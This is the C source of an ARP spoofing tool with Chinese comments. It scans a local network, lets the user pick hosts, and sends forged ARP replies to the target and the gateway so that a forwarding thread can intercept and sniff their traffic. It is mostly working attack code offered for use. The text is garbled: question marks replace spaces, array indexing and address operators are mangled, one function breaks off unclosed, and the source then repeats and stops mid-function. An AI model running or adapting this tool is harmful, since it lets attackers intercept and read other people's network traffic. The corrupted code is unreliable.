ARP欺骗的源代码
#include?<stdlib.h>
#include?<stdio.h>
#include?<pcap.h>?//winpcap的頭文件
#include?<winsock2.h>
#include?<process.h>?//多線程編程的頭文件
#include?<windows.h>
#include?<Iphlpapi.h>?//提取網關用的頭文件
#pragma?comment(lib,"ws2_32")
#pragma?comment(lib,"pcap")
#pragma?comment(lib,"IPHlpApi")
#define?IPTOSBUFFERS?12?
#define?MOSTCHEATNUMBER?256?//最大的欺騙數目
#define?ETH_IP?0x0800?//定義各種標識的數值
#define?ETH_ARP?0x0806
#define?ARP_REPLY?0x0002
#define?ARP_REQUEST?0x0001
#define?ARP_HARDWARE?0x0001
/
typedef?struct?ethdr?//以太頭結構
{
unsigned?char?eh_dst[6];
unsigned?char?eh_src[6];
unsigned?short?eh_type;
}ETHDR,*PETHDR;
typedef?struct?arphdr?//arp頭結構
{
unsigned?short?arp_hdr;
unsigned?short?arp_pro;
unsigned?char?arp_hln;
unsigned?char?arp_pln;
unsigned?short?arp_opt;
unsigned?char?arp_sha[6];
unsigned?long?arp_spa;
unsigned?char?arp_tha[6];
unsigned?long?arp_tpa;
}ARPHDR,*PARPHDR;
typedef?struct?acttiveIpwithMac?//用于存儲ip與對應mac的結構
{
acttiveIpwithMac*?next;
unsigned?long?ip;
unsigned?char?mac[6];
}acttiveIpwithMac,*PacttiveIpwithMac;
char?*iptos(u_long?in);?//用來將網絡的ip地址轉換成4字節形式?
void?ifprint(pcap_if_t?*d);?//顯示pcap_if結構的信息
int?macequal(PacttiveIpwithMac?m,PacttiveIpwithMac?n);?//判斷兩個mac是否相同
int?getmmac();?//獲得自己mac的函數.用pcap實現.當讓還可以用GetAdaptersInfo來獲得
unsigned?int?_stdcall?sendpackettogetallacttiveIpwithMac(void?*x);?//向局域網內發arp請求包掃描
unsigned?int?_stdcall?recvpackettogetallacttiveIpwithMac(void?*x);?//接受并存儲局域網的arp響應信息
unsigned?int?_stdcall?sproof(void?*x);?//欺騙某一特定的主機,需傳遞主機的序號,序號由掃描獲得
unsigned?int?_stdcall?transmitandsniffer(void?*x);?//轉發包的線程
int?Getgatewayip(ULONG?choosedip);?//獲取本地的網關ip
//
PacttiveIpwithMac?myip,gateip,Pipmachead=NULL;?//定義全局變量記錄我的和網關的ip和mac
ULONG?mynetmask;?//我的子網掩碼
pcap_t?*slecadopt;?//指向選擇網卡的指針?
int?Ssendover=0;?//用于控制線程的標志
int?cheat[MOSTCHEATNUMBER];?//用于控制欺騙線程的標志
///
int?main()?
{
???myip=new?acttiveIpwithMac;?//記錄自己的ip
gateip=new?acttiveIpwithMac;?//記錄網關的ip
u_long?sendarphd,recvarphd,transhd,sproofhd[MOSTCHEATNUMBER];?//用于線程控制的變量
???PacttiveIpwithMac?z,k,j;
???unsigned?sendarpid,recvarpid,transid,sproofid[MOSTCHEATNUMBER];?//用于線程控制的變量
???pcap_if_t?*alldevs,*d;?//pcap里對網卡的控制量
int?i=0,m,maxactive,inum;
char?error[PCAP_ERRBUF_SIZE];?
???
/*?獲得網卡的列表?*/
if?(pcap_findalldevs(&alldevs,?error)?==?-1)
{
fprintf(stderr,"Error?in?pcap_findalldevs:?%s\n",?error);
return?-1;
}
/*?打印網卡信息?*/
for(d=alldevs;?d;?d=d->next)
{
printf("%d.?",?++i);
???ifprint(d);?/*?循環調用ifprint()?來顯示pcap_if結構的信息*/
if?(d->description)
printf("?(%s)\n",?d->description);
else
printf("?(No?description?available)\n");
}
???
if(i==0)
{
printf("\nNo?interfaces?found!?Make?sure?WinPcap?is?installed.\n");
return?-1;
}
printf("Enter?the?interface?number?(1-%d):",i);
scanf("%d",?&inum);?//輸入要選擇打開的網卡號
if(inum?<?1?||?inum?>?i)?//判斷號的合法性
{
printf("\nInterface?number?out?of?range.\n");
/*?Free?the?device?list?*/
pcap_freealldevs(alldevs);
return?-1;
}
/*?找到要選擇的網卡結構?*/
for(d=alldevs,?i=0;?i<?inum-1?;d=d->next,?i++);
???/*找到我的ip*/
???myip->ip=((struct?sockaddr_in?*)d->addresses->addr)->sin_addr.s_addr;
???/*獲得選擇網卡的子網掩碼*/
???mynetmask=((struct?sockaddr_in?*)d->addresses->netmask)->sin_addr.s_addr;
???//printf("netmask:%s\n\n",iptos(mynetmask));
/*?打開選擇的網卡?*/
if((slecadopt?=?pcap_open_live(d->name,?1000,?1,?1,?error)?)?==?NULL)
{
fprintf(stderr,"\nError?opening?adapter:?%s\n",?error);
???pcap_freealldevs(alldevs);
return?-1;
}
/*獲取網關的信息*/
if(Getgatewayip(myip->ip))
???printf("\tGateway:?%s\n",iptos(gateip->ip));
/*獲取本地mac*/
???while(getmmac()==0);
???printf("my?mac:?%02x:%02x:%02x:%02x:%02x:%02x\n\n",myip->mac[0],myip->mac[1],myip->mac[2],myip->mac[3],myip->mac[4],myip->mac[5]);
/*掃描局域網內活動主機*/
sendarphd=_beginthreadex(NULL,0,sendpackettogetallacttiveIpwithMac,0,0,&sendarpid);//開啟arp掃描包線程
???recvarphd=_beginthreadex(NULL,0,recvpackettogetallacttiveIpwithMac,0,0,&recvarpid);//開啟接收arp響應包線程
WaitForSingleObject((HANDLE)sendarphd,INFINITE);?//主線程停止等待發送線程結束
???for(m=5;m>0;m--)
???{
???printf("scanning\n");
Sleep(500);?//等待回應包到達,共等2500ms.不夠可調
???}
???Ssendover=1;//置標志,停止接收線程
???WaitForSingleObject((HANDLE)recvarphd,INFINITE);?//主線程停止等待接收線程結束
???if(Pipmachead!=NULL)
???{
???/*去處重復的活動主機*/
???for(k=Pipmachead;k->next!=NULL;k=k->next)
???for(z=k;z->next!=NULL;)
???{
???if((k->ip==z->next->ip)&&(macequal(k,z->next)))
???{
j=z->next;
???z->next=j->next;
???delete?j;
???}
???else
z=z->next;
???}
???/*輸出列表*/
???for(z=Pipmachead,i=1;z!=NULL;z=z->next,i++)
printf("%-3d?ip=%-20s?mac=%02x:%02x:%02x:%02x:%02x:%02x\n",i,iptos(z->ip),z->mac[0],z->mac[1],z->mac[2],z->mac[3],z->mac[4],z->mac[5]);
???}
???for(k=Pipmachead;k->next!=NULL;k=k->next)
if(k->ip==gateip->ip)
gateip=k;
???maxactive=i-1;
???CloseHandle((HANDLE)sendarphd);
???CloseHandle((HANDLE)recvarphd);
???transhd=_beginthreadex(NULL,0,transmitandsniffer,0,0,&transid);?//開啟轉發線程
printf("transmitandsniffer已經開始了!!\n");
???for(i=0;i<256;i++)
cheat=0;
???printf("已經得到了本局域網的活動主機!!!\n選擇你想欺騙的機器序號一次一臺:");
printf("選擇你想欺騙的機器序號:\n");
???for(;;)
???{
???scanf("%d",&i);
???if(i>0&&i<=maxactive)
???{
???if(cheat[i-1]==0)
???{
???cheat[i-1]=1;
???sproofhd[i-1]=_beginthreadex(NULL,0,sproof,&i,0,&sproofid[i-1]);
???}
???else
???printf("\n%d號機已經欺騙了!!大佬!!\n",i);
???}
???else?if(i<0&&i>=-maxactive)
???{
???if(cheat[-i-1]==1)
???{
cheat[-i-1]=0;
CloseHandle((HANDLE)sproofhd[i-1]);
???}
???else
???printf("\n%d號機沒欺騙怎么結束啊!!大佬!!\n",-i);
???}
???else?if(i>maxactive||-i>maxactive)
???{
???printf("\n沒有這么多機器,大哥,只有%d臺!!\n",maxactive);
???}
???else
???{
for(i=0;i<256;i++)
???cheat=0;
???}
???Sleep(100);
Sleep(100);
???Sleep(100);
???Sleep(100);
for(i=0;i<256;i++)
if(cheat==1)
???printf("\n%d號機正在被欺騙和嗅探選擇,想退出對此機的嗅探輸入-%d",i+1,i+1);
Sleep(100);
???Sleep(100);
???printf("\n選擇你想嗅探的機器序號:");
???
???}
???return?1;
}
char?*iptos(u_long?in)
{
static?char?output[IPTOSBUFFERS][3*4+3+1];
static?short?which;
u_char?*p;
p?=?(u_char?*)∈
which?=?(which?+?1?==?IPTOSBUFFERS???0?:?which?+?1);
sprintf(output[which],?"%d.%d.%d.%d",?p[0],?p[1],?p[2],?p[3]);
return?output[which];
}
int?macequal(PacttiveIpwithMac?m,PacttiveIpwithMac?n)
{
int?i=0;
if(memcmp(n->mac,m->mac,6)==0)
i=1;
return?i;
}
void?ifprint(pcap_if_t?*d)
{
pcap_addr_t?*a;
/*?Name?*/
printf("%s\n",d->name);
/*?Description?*/
if?(d->description)
printf("\tDescription:?%s\n",d->description);
/*?Loopback?Address*/
printf("\tLoopback:?%s\n",(d->flags?&?PCAP_IF_LOOPBACK)?"yes":"no");
/*?IP?addresses?*/
for(a=d->addresses;a;a=a->next)?
{
printf("\tAddress?Family:?#%d\n",a->addr->sa_family);
/*關于?sockaddr_in?結構請參考其他的網絡編程書*/
switch(a->addr->sa_family)
{
case?AF_INET:
printf("\tAddress?Family?Name:?AF_INET\n");//打印網絡地址類型
if?(a->addr)//打印IP地址
printf("\tAddress:?%s\n",iptos(((struct?sockaddr_in?*)a->addr)->sin_addr.s_addr));
if?(a->netmask)//打印掩碼
printf("\tNetmask:?%s\n",iptos(((struct?sockaddr_in?*)a->netmask)->sin_addr.s_addr));
if?(a->broadaddr)//打印廣播地址
printf("\tBroadcast?Address:?%s\n",iptos(((struct?sockaddr_in?*)a->broadaddr)->sin_addr.s_addr));
if?(a->dstaddr)//目的地址
printf("\tDestination?Address:?%s\n",iptos(((struct?sockaddr_in?*)a->dstaddr)->sin_addr.s_addr));
break;
default:
printf("\tAddress?Family?Name:?Unknown\n");
break;
}
}
}
int?Getgatewayip(ULONG?choosedip)
{
PIP_ADAPTER_INFO?pAdapterInfo;
PIP_ADAPTER_INFO?pAdapter?=?NULL;
DWORD?dwRetVal?=?0;;
//ULONG?p;
pAdapterInfo?=?(IP_ADAPTER_INFO?*)?malloc(?sizeof(IP_ADAPTER_INFO)?);
ULONG?ulOutBufLen?=?sizeof(IP_ADAPTER_INFO);
//?Make?an?initial?call?to?GetAdaptersInfo?to?get
//?the?necessary?size?into?the?ulOutBufLen?variable
if?(GetAdaptersInfo(?pAdapterInfo,?&ulOutBufLen)?==?ERROR_BUFFER_OVERFLOW)?
{
free(pAdapterInfo);?//malloc動態聲請的空間要free
pAdapterInfo?=?(IP_ADAPTER_INFO?*)?malloc?(ulOutBufLen);?
}
if?((dwRetVal?=?GetAdaptersInfo(?pAdapterInfo,?&ulOutBufLen))?==?NO_ERROR)?
{
pAdapter?=?pAdapterInfo;
???while?(pAdapter)?
{
if(myip->ip==inet_addr(pAdapter->IpAddressList.IpAddress.String))
???{
???gateip->ip=inet_addr(pAdapter->GatewayList.IpAddress.String);
???return?1;
???}
printf("\t***\n");
???pAdapter?=?pAdapter->Next;
}
}
return?0;
}
int?getmmac()
{?
unsigned?char?sendbuf[42];
int?i=7,k;
ETHDR?eth;
ARPHDR?arp;
struct?pcap_pkthdr?*?pkt_header;
u_char?*?pkt_data;?
for(k=0;k<6;k++)
{
eth.eh_dst[k]=0xff;
eth.eh_src[k]=0x0f;
arp.arp_sha[k]=0x0f;
arp.arp_tha[k]=0x00;
}
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REQUEST);
arp.arp_tpa=myip->ip;
arp.arp_spa=inet_addr("127.0.0.2");?//隨便設的請求方ip
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,e,sizeof(eth));
memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));
if(pcap_sendpacket(slecadopt,sendbuf,42)==0)
{
printf("PacketSend?succeed\n\n");
}
else
{
printf("PacketSendPacket?in?getmine?Error:?%d\n",GetLastError());
return?0;
}
while((k=pcap_next_ex(slecadopt,&pkt_header,(const?u_char**)&pkt_data))>=0)
{?
if(*(unsigned?short?*)(pkt_data+12)==htons(ETH_ARP)&&*(unsigned?short*)(pkt_data+20)==htons(ARP_REPLY)&&*(unsigned?long*)(pkt_data+38)==inet_addr("127.0.0.2"))
{
for(i=0;i<6;i++)
{
myip->mac=*(unsigned?char*)(pkt_data+22+i);
}
break;
}
}
if(i==6)
{
return?1;
}
else
{
return?0;
}
}
unsigned?int?_stdcall?sendpackettogetallacttiveIpwithMac(void?*x)
{?
ULONG?tip,subnetsta,subnetend;
unsigned?char?sendbuf[42];
int?k;
ETHDR?eth;
ARPHDR?arp;
subnetsta=htonl(myip->ip&mynetmask);?//計算內網ip起點
subnetend=htonl(htonl(subnetsta)|(~mynetmask));?//計算內網ip結束
for(k=0;k<6;k++)
{
eth.eh_dst[k]=0xff;
eth.eh_src[k]=myip->mac[k];
arp.arp_sha[k]=myip->mac[k];
arp.arp_tha[k]=0x00;
}
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REQUEST);
arp.arp_spa=myip->ip;
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,e,sizeof(eth));
for(tip=subnetsta;tip<=subnetend;tip++)
{
arp.arp_tpa=htonl(tip);
memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));
???if(pcap_sendpacket(slecadopt,sendbuf,42)!=0)
{
printf("Getallactive?ip?PacketSendPacket?in?getmine?Error:?%d\n",GetLastError());
return?0;
}
}
return?1;
}
unsigned?int?_stdcall?recvpackettogetallacttiveIpwithMac(void?*x)
{?
struct?pcap_pkthdr?*?pkt_header;
u_char?*?pkt_data;?
PacttiveIpwithMac?p,q;
int?i;
while((pcap_next_ex(slecadopt,&pkt_header,(const?u_char**)&pkt_data))>0)
{?
if(*(unsigned?short?*)(pkt_data+12)==htons(ETH_ARP)&&*(unsigned?short*)(pkt_data+20)==htons(ARP_REPLY)&&*(unsigned?long*)(pkt_data+38)==myip->ip)
{
p=new?acttiveIpwithMac;
p->next=NULL;
p->ip=*(unsigned?long*)(pkt_data+28);
for(i=0;i<6;i++)
{
???p->mac=*(unsigned?char*)(pkt_data+22+i);
}
if(Pipmachead==NULL)
{?
???Pipmachead=p;
q=p;
}
else
{
q->next=p;
q=p;
}?
}
if(Ssendover==1)
{
???return?1;
}
}
return?1;
}
unsigned?int?_stdcall?transmitandsniffer(void?*x)
{
struct?changemac
{
unsigned?char?mac[12];
};
unsigned?char?bcast[6];
memset(bcast,0xff,sizeof(bcast));
unsigned?char?sendbuf[1600];
struct?pcap_pkthdr?*?pkt_header;
u_char?*?pkt_data;
changemac?*cmac,*togatewaymac;
PacttiveIpwithMac?z;
int?i,j;
cmac=new?changemac;
togatewaymac=new?changemac;
memcpy(togatewaymac->mac,gateip->mac,6);
memcpy(togatewaymac->mac+6,myip->mac,6);
//printf("1have?run?to?here!!!\n");
while((j=pcap_next_ex(slecadopt,&pkt_header,(const?u_char**)&pkt_data))>=0)
{?
???if(j==0)
{
//printf("2have?run?to?here!!!\n");
continue;
}
if(*(unsigned?short?*)(pkt_data+12)==htons(ETH_IP)&&(!(memcmp(pkt_data+6,myip->mac,6)==0))&&*(unsigned?long?*)(pkt_data+30)!=myip->ip&&(!(memcmp(pkt_data,bcast,6)==0)))//(*(unsigned?char*)(pkt_data+6)==myip->mac[0]&&*(unsigned?char*)(pkt_data+7)==myip->mac[1]&&*(unsigned?char*)(pkt_data+8)==myip->mac[2]&&*(unsigned?char*)(pkt_data+9)==myip->mac[3]&&*(unsigned?char*)(pkt_data+10)==myip->mac[4]&&*(unsigned?char*)(pkt_data+11)==myip->mac[5])))
{
//if()//(!(*(unsigned?char*)(pkt_data+0)==0xff&&*(unsigned?char*)(pkt_data+1)==0xff&&*(unsigned?char*)(pkt_data+2)==0xff&&*(unsigned?char*)(pkt_data+3)==0xff&&*(unsigned?char*)(pkt_data+4)==0xff&&*(unsigned?char*)(pkt_data+5)==0xff))&&)
//{?//for(i=0;i<6;i++)
//?printf("%02x:",*(unsigned?char*)(pkt_data+i));
//printf("33have?run?to?here!!!\n");
memcpy(sendbuf,pkt_data,pkt_header->caplen);
???memcpy(sendbuf,togatewaymac,12);
for(z=Pipmachead;z!=NULL;z=z->next)
{//printf("444have?run?to?here!!!\n");
???if(*(unsigned?long?*)(pkt_data+30)==z->ip)
{
???i=0;
//printf("jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjip=%s",iptos(z->ip));
???//for(;i<6;i++)
???//cmac->mac=z->mac;
memcpy(cmac->mac,z->mac,6);
???//for(;i<12;i++)
???//cmac->mac=myip->mac[i-6];
memcpy(cmac->mac+6,myip->mac,6);
???//memset(sendbuf,0,sizeof(sendbuf));
???memcpy(sendbuf,cmac,12);
??????/*if(*///!=0)
break;
//{
???//?printf("tansmit?Error:?%d\n",GetLastError());
???//?return?0;
//?}
}?
}
pcap_sendpacket(slecadopt,sendbuf,pkt_header->caplen);
???
//}//printf("getip:%s?len:%d\n",iptos(*(unsigned?long?*)(pkt_data+30)),pkt_header->caplen);
}
}
return?1;
}
unsigned?int?_stdcall?sproof(void?*x)
{
int?j,i=*(int*)x;
unsigned?char?sendbuftogate[42],sendbuftosp[42],rsendbuftogate[42],rsendbuftosp[42];
PacttiveIpwithMac?spip;
ETHDR?eth;
ARPHDR?arp;
int?k;
for(spip=Pipmachead,j=0;j<i-1;spip=spip->next,j++);
printf("%-3d?ip=%-20s?mac=%02x:%02x:%02x:%02x:%02x:%02x\n",i,iptos(spip->ip),spip->mac[0],spip->mac[1],spip->mac[2],spip->mac[3],spip->mac[4],spip->mac[5]);
for(k=0;k<6;k++)
{
eth.eh_dst[k]=gateip->mac[k];
eth.eh_src[k]=myip->mac[k];
arp.arp_sha[k]=myip->mac[k];
arp.arp_tha[k]=gateip->mac[k];
}
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REPLY);
arp.arp_spa=spip->ip;
arp.arp_tpa=gateip->ip;
memset(sendbuftogate,0,sizeof(sendbuftogate));
memcpy(sendbuftogate,e,sizeof(eth));
memcpy(sendbuftogate+sizeof(eth),&arp,sizeof(arp));
for(k=0;k<6;k++)
{
eth.eh_dst[k]=spip->mac[k];
eth.eh_src[k]=myip->mac[k];
arp.arp_sha[k]=myip->mac[k];
arp.arp_tha[k]=spip->mac[k];
}
arp.arp_spa=gateip->ip;
arp.arp_tpa=spip->ip;
memset(sendbuftosp,0,sizeof(sendbuftosp));
memcpy(sendbuftosp,e,sizeof(eth));
memcpy(sendbuftosp+sizeof(eth),&arp,sizeof(arp));
for(k=0;k<6;k++)
{
eth.eh_dst[k]=spip->mac[k];
eth.eh_src[k]=gateip->mac[k];
arp.arp_sha[k]=gateip->mac[k];
arp.arp_tha[k]=spip->mac[k];
}
arp.arp_spa=gateip->ip;
arp.arp_tpa=spip->ip;
memset(rsendbuftosp,0,sizeof(rsendbuftosp));
memcpy(rsendbuftosp,e,sizeof(eth));
memcpy(rsendbuftosp+sizeof(eth),&arp,sizeof(arp));
for(k=0;k<6;k++)
{
eth.eh_dst[k]=gateip->mac[k];
eth.eh_src[k]=spip->mac[k];
arp.arp_sha[k]=spip->mac[k];
arp.arp_tha[k]=gateip->mac[k];
}
arp.arp_spa=spip->ip;
arp.arp_tpa=gateip->ip;
memset(rsendbuftogate,0,sizeof(rsendbuftogate));
memcpy(rsendbuftogate,e,sizeof(eth));
memcpy(rsendbuftogate+sizeof(eth),&arp,sizeof(arp));
printf("已經進入%d號機的欺騙!!!\n",i);
while(TRUE)
{?
if(pcap_sendpacket(slecadopt,sendbuftogate,42)!=0)
{
???printf("sendbuftogate?Error:?%d\n",GetLastError());
???return?0;
}
???if(pcap_sendpacket(slecadopt,sendbuftosp,42)!=0)
{
???printf("sendbuftosp?Error:?%d\n",GetLastError());
???return?0;
}
Sleep(980);
if(cheat[i-1]==0)?//重置被欺騙的目標機!!
{
for(j=10;j>0;j--)
{
if(pcap_sendpacket(slecadopt,rsendbuftogate,42)!=0)
{
???printf("sendbuftogate?Error:?%d\n",GetLastError());
???return?0;
}
???if(pcap_sendpacket(slecadopt,rsendbuftosp,42)!=0)
{
???printf("sendbuftosp?Error:?%d\n",GetLastError());
???return?0;
}
}
printf("已經退出對%d號機的欺騙!!!\n",i);
return?1;
}
}
#include?<stdio.h>
#include?<pcap.h>?//winpcap的頭文件
#include?<winsock2.h>
#include?<process.h>?//多線程編程的頭文件
#include?<windows.h>
#include?<Iphlpapi.h>?//提取網關用的頭文件
#pragma?comment(lib,"ws2_32")
#pragma?comment(lib,"pcap")
#pragma?comment(lib,"IPHlpApi")
#define?IPTOSBUFFERS?12?
#define?MOSTCHEATNUMBER?256?//最大的欺騙數目
#define?ETH_IP?0x0800?//定義各種標識的數值
#define?ETH_ARP?0x0806
#define?ARP_REPLY?0x0002
#define?ARP_REQUEST?0x0001
#define?ARP_HARDWARE?0x0001
/
typedef?struct?ethdr?//以太頭結構
{
unsigned?char?eh_dst[6];
unsigned?char?eh_src[6];
unsigned?short?eh_type;
}ETHDR,*PETHDR;
typedef?struct?arphdr?//arp頭結構
{
unsigned?short?arp_hdr;
unsigned?short?arp_pro;
unsigned?char?arp_hln;
unsigned?char?arp_pln;
unsigned?short?arp_opt;
unsigned?char?arp_sha[6];
unsigned?long?arp_spa;
unsigned?char?arp_tha[6];
unsigned?long?arp_tpa;
}ARPHDR,*PARPHDR;
typedef?struct?acttiveIpwithMac?//用于存儲ip與對應mac的結構
{
acttiveIpwithMac*?next;
unsigned?long?ip;
unsigned?char?mac[6];
}acttiveIpwithMac,*PacttiveIpwithMac;
char?*iptos(u_long?in);?//用來將網絡的ip地址轉換成4字節形式?
void?ifprint(pcap_if_t?*d);?//顯示pcap_if結構的信息
int?macequal(PacttiveIpwithMac?m,PacttiveIpwithMac?n);?//判斷兩個mac是否相同
int?getmmac();?//獲得自己mac的函數.用pcap實現.當讓還可以用GetAdaptersInfo來獲得
unsigned?int?_stdcall?sendpackettogetallacttiveIpwithMac(void?*x);?//向局域網內發arp請求包掃描
unsigned?int?_stdcall?recvpackettogetallacttiveIpwithMac(void?*x);?//接受并存儲局域網的arp響應信息
unsigned?int?_stdcall?sproof(void?*x);?//欺騙某一特定的主機,需傳遞主機的序號,序號由掃描獲得
unsigned?int?_stdcall?transmitandsniffer(void?*x);?//轉發包的線程
int?Getgatewayip(ULONG?choosedip);?//獲取本地的網關ip
//
PacttiveIpwithMac?myip,gateip,Pipmachead=NULL;?//定義全局變量記錄我的和網關的ip和mac
ULONG?mynetmask;?//我的子網掩碼
pcap_t?*slecadopt;?//指向選擇網卡的指針?
int?Ssendover=0;?//用于控制線程的標志
int?cheat[MOSTCHEATNUMBER];?//用于控制欺騙線程的標志
///
int?main()?
{
???myip=new?acttiveIpwithMac;?//記錄自己的ip
gateip=new?acttiveIpwithMac;?//記錄網關的ip
u_long?sendarphd,recvarphd,transhd,sproofhd[MOSTCHEATNUMBER];?//用于線程控制的變量
???PacttiveIpwithMac?z,k,j;
???unsigned?sendarpid,recvarpid,transid,sproofid[MOSTCHEATNUMBER];?//用于線程控制的變量
???pcap_if_t?*alldevs,*d;?//pcap里對網卡的控制量
int?i=0,m,maxactive,inum;
char?error[PCAP_ERRBUF_SIZE];?
???
/*?獲得網卡的列表?*/
if?(pcap_findalldevs(&alldevs,?error)?==?-1)
{
fprintf(stderr,"Error?in?pcap_findalldevs:?%s\n",?error);
return?-1;
}
/*?打印網卡信息?*/
for(d=alldevs;?d;?d=d->next)
{
printf("%d.?",?++i);
???ifprint(d);?/*?循環調用ifprint()?來顯示pcap_if結構的信息*/
if?(d->description)
printf("?(%s)\n",?d->description);
else
printf("?(No?description?available)\n");
}
???
if(i==0)
{
printf("\nNo?interfaces?found!?Make?sure?WinPcap?is?installed.\n");
return?-1;
}
printf("Enter?the?interface?number?(1-%d):",i);
scanf("%d",?&inum);?//輸入要選擇打開的網卡號
if(inum?<?1?||?inum?>?i)?//判斷號的合法性
{
printf("\nInterface?number?out?of?range.\n");
/*?Free?the?device?list?*/
pcap_freealldevs(alldevs);
return?-1;
}
/*?找到要選擇的網卡結構?*/
for(d=alldevs,?i=0;?i<?inum-1?;d=d->next,?i++);
???/*找到我的ip*/
???myip->ip=((struct?sockaddr_in?*)d->addresses->addr)->sin_addr.s_addr;
???/*獲得選擇網卡的子網掩碼*/
???mynetmask=((struct?sockaddr_in?*)d->addresses->netmask)->sin_addr.s_addr;
???//printf("netmask:%s\n\n",iptos(mynetmask));
/*?打開選擇的網卡?*/
if((slecadopt?=?pcap_open_live(d->name,?1000,?1,?1,?error)?)?==?NULL)
{
fprintf(stderr,"\nError?opening?adapter:?%s\n",?error);
???pcap_freealldevs(alldevs);
return?-1;
}
/*獲取網關的信息*/
if(Getgatewayip(myip->ip))
???printf("\tGateway:?%s\n",iptos(gateip->ip));
/*獲取本地mac*/
???while(getmmac()==0);
???printf("my?mac:?%02x:%02x:%02x:%02x:%02x:%02x\n\n",myip->mac[0],myip->mac[1],myip->mac[2],myip->mac[3],myip->mac[4],myip->mac[5]);
/*掃描局域網內活動主機*/
sendarphd=_beginthreadex(NULL,0,sendpackettogetallacttiveIpwithMac,0,0,&sendarpid);//開啟arp掃描包線程
???recvarphd=_beginthreadex(NULL,0,recvpackettogetallacttiveIpwithMac,0,0,&recvarpid);//開啟接收arp響應包線程
WaitForSingleObject((HANDLE)sendarphd,INFINITE);?//主線程停止等待發送線程結束
???for(m=5;m>0;m--)
???{
???printf("scanning\n");
Sleep(500);?//等待回應包到達,共等2500ms.不夠可調
???}
???Ssendover=1;//置標志,停止接收線程
???WaitForSingleObject((HANDLE)recvarphd,INFINITE);?//主線程停止等待接收線程結束
???if(Pipmachead!=NULL)
???{
???/*去處重復的活動主機*/
???for(k=Pipmachead;k->next!=NULL;k=k->next)
???for(z=k;z->next!=NULL;)
???{
???if((k->ip==z->next->ip)&&(macequal(k,z->next)))
???{
j=z->next;
???z->next=j->next;
???delete?j;
???}
???else
z=z->next;
???}
???/*輸出列表*/
???for(z=Pipmachead,i=1;z!=NULL;z=z->next,i++)
printf("%-3d?ip=%-20s?mac=%02x:%02x:%02x:%02x:%02x:%02x\n",i,iptos(z->ip),z->mac[0],z->mac[1],z->mac[2],z->mac[3],z->mac[4],z->mac[5]);
???}
???for(k=Pipmachead;k->next!=NULL;k=k->next)
if(k->ip==gateip->ip)
gateip=k;
???maxactive=i-1;
???CloseHandle((HANDLE)sendarphd);
???CloseHandle((HANDLE)recvarphd);
???transhd=_beginthreadex(NULL,0,transmitandsniffer,0,0,&transid);?//開啟轉發線程
printf("transmitandsniffer已經開始了!!\n");
???for(i=0;i<256;i++)
cheat=0;
???printf("已經得到了本局域網的活動主機!!!\n選擇你想欺騙的機器序號一次一臺:");
printf("選擇你想欺騙的機器序號:\n");
???for(;;)
???{
???scanf("%d",&i);
???if(i>0&&i<=maxactive)
???{
???if(cheat[i-1]==0)
???{
???cheat[i-1]=1;
???sproofhd[i-1]=_beginthreadex(NULL,0,sproof,&i,0,&sproofid[i-1]);
???}
???else
???printf("\n%d號機已經欺騙了!!大佬!!\n",i);
???}
???else?if(i<0&&i>=-maxactive)
???{
???if(cheat[-i-1]==1)
???{
cheat[-i-1]=0;
CloseHandle((HANDLE)sproofhd[i-1]);
???}
???else
???printf("\n%d號機沒欺騙怎么結束啊!!大佬!!\n",-i);
???}
???else?if(i>maxactive||-i>maxactive)
???{
???printf("\n沒有這么多機器,大哥,只有%d臺!!\n",maxactive);
???}
???else
???{
for(i=0;i<256;i++)
???cheat=0;
???}
???Sleep(100);
Sleep(100);
???Sleep(100);
???Sleep(100);
for(i=0;i<256;i++)
if(cheat==1)
???printf("\n%d號機正在被欺騙和嗅探選擇,想退出對此機的嗅探輸入-%d",i+1,i+1);
Sleep(100);
???Sleep(100);
???printf("\n選擇你想嗅探的機器序號:");
???
???}
???return?1;
}
char?*iptos(u_long?in)
{
static?char?output[IPTOSBUFFERS][3*4+3+1];
static?short?which;
u_char?*p;
p?=?(u_char?*)∈
which?=?(which?+?1?==?IPTOSBUFFERS???0?:?which?+?1);
sprintf(output[which],?"%d.%d.%d.%d",?p[0],?p[1],?p[2],?p[3]);
return?output[which];
}
int?macequal(PacttiveIpwithMac?m,PacttiveIpwithMac?n)
{
int?i=0;
if(memcmp(n->mac,m->mac,6)==0)
i=1;
return?i;
}
void?ifprint(pcap_if_t?*d)
{
pcap_addr_t?*a;
/*?Name?*/
printf("%s\n",d->name);
/*?Description?*/
if?(d->description)
printf("\tDescription:?%s\n",d->description);
/*?Loopback?Address*/
printf("\tLoopback:?%s\n",(d->flags?&?PCAP_IF_LOOPBACK)?"yes":"no");
/*?IP?addresses?*/
for(a=d->addresses;a;a=a->next)?
{
printf("\tAddress?Family:?#%d\n",a->addr->sa_family);
/*關于?sockaddr_in?結構請參考其他的網絡編程書*/
switch(a->addr->sa_family)
{
case?AF_INET:
printf("\tAddress?Family?Name:?AF_INET\n");//打印網絡地址類型
if?(a->addr)//打印IP地址
printf("\tAddress:?%s\n",iptos(((struct?sockaddr_in?*)a->addr)->sin_addr.s_addr));
if?(a->netmask)//打印掩碼
printf("\tNetmask:?%s\n",iptos(((struct?sockaddr_in?*)a->netmask)->sin_addr.s_addr));
if?(a->broadaddr)//打印廣播地址
printf("\tBroadcast?Address:?%s\n",iptos(((struct?sockaddr_in?*)a->broadaddr)->sin_addr.s_addr));
if?(a->dstaddr)//目的地址
printf("\tDestination?Address:?%s\n",iptos(((struct?sockaddr_in?*)a->dstaddr)->sin_addr.s_addr));
break;
default:
printf("\tAddress?Family?Name:?Unknown\n");
break;
}
}
}
int?Getgatewayip(ULONG?choosedip)
{
PIP_ADAPTER_INFO?pAdapterInfo;
PIP_ADAPTER_INFO?pAdapter?=?NULL;
